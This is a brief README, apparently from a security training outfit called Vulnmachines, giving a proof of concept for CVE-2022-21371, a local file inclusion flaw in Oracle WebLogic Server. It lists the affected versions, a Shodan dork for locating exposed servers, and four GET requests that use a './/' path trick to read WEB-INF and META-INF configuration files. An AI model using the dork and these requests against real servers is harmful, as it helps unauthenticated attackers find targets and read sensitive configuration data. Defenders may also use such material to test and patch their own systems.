└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # Oracle-WebLogic-CVE-2022-21371
 2 | 
 3 | Oracle WebLogic Server Local File Inclusion : CVE-2022-21371
 4 | 
 5 | Affected Version: Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
 6 | 
 7 | Description: The Oracle Fusion Middleware's Oracle WebLogic Server product (Web Container component) is vulnerable to local file inclusion. An easily exploited vulnerability could allow an unauthenticated attacker with HTTP network access to compromise Oracle WebLogic Server.
 8 | A successful attack on this vulnerability, provide hackers complete access to Oracle WebLogic Server's whole data store or unrestricted access to sensitive data.
 9 | 
10 | ##### Dork:
11 | Shodan: product:"Oracle WebLogic"
12 | 
13 | ##### Proof of Concept
14 | 
15 | ``` GET .//META-INF/MANIFEST.MF
16 | GET .//WEB-INF/web.xml
17 | GET .//WEB-INF/portlet.xml
18 | GET .//WEB-INF/weblogic.xml 
19 | ```
20 | 
21 | 
22 | #### Follow us 
23 | #### [Vulnmachines Platform](https://www.vulnmachines.com)
24 | #### [YouTube](https://www.youtube.com/c/vulnmachines)
25 | #### [Twitter](https://www.twitter.com/vulnmachines)
26 | #### [Facebook](https://www.facebook.com/vulnmachines)
27 | #### [LinkedIn](https://www.linkedin.com/company/vulnmachines)
28 | 


--------------------------------------------------------------------------------